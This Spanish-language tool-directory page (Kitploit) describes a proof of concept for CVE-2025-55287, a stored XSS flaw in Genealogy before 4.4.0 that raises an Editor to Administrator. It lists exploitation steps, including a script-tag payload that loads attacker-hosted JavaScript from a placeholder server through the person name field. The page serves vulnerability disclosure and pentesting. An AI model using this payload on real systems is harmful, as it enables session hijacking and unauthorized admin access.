Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55287-POC — PoC de escalada de privilegios mediante XSS almacenado autenticado. Afecta a las versiones de Genealogy anteriores a la 4.4.0. | Kitploit
Herramientas/GitHubGitHub/eternalvalhalla/cve-2025-55287-poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubeternalvalhalla/cve-2025-55287-poc

CVE-2025-55287-POC

PoC de escalada de privilegios mediante XSS almacenado autenticado. Afecta a las versiones de Genealogy anteriores a la 4.4.0.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
17hace 1 añoAún no revisado

CVE-2025-55287-POC

El Cross-Site Scripting Almacenado autenticado (XSS) en la aplicación Genealogy anterior a 4.4.0 permite la ejecución arbitraria de JavaScript y la escalada de privilegios desde el rol Editor+ a Administrador.

Resumen
  • Tipo de vulnerabilidad: Cross-Site Scripting Almacenado (CWE-79)
  • Componente afectado: 'Person' nombre y apellido.
  • Versiones afectadas: Todas las versiones anteriores a 4.4.0
  • Impacto: Ejecución persistente de JavaScript suministrado por el atacante en los navegadores de las víctimas; secuestro de sesión, CSRF mediante DOM, redress de la interfaz de usuario, robo de credenciales o acciones arbitrarias como la víctima.
  • Vector de ataque: Autenticado (cualquier rol con creación de nuevas personas - editor+)
Explotación

Causa raíz: saneamiento/codificación inadecuados en el lado del servidor del nombre y apellido de la persona tras la eliminación exitosa de la persona afectada por un usuario con mayores privilegios.

PoC:

  1. Autentícate en la aplicación (rol editor+).
  2. Crea una nueva persona (no es necesario que esté asignada a ninguna familia).
  3. Incluye el JavaScript como nombre o apellido de la persona añadida: <script src='yourserver/poc.js'></script>
  4. Edita el poc.js con tu dirección de correo electrónico en el marcador de posición.
  5. Una vez que un usuario privilegiado intente eliminar a la persona recién añadida, recibirás una invitación a la plataforma en la dirección de correo electrónico proporcionada con el rol de Administrador.
Descargar herramienta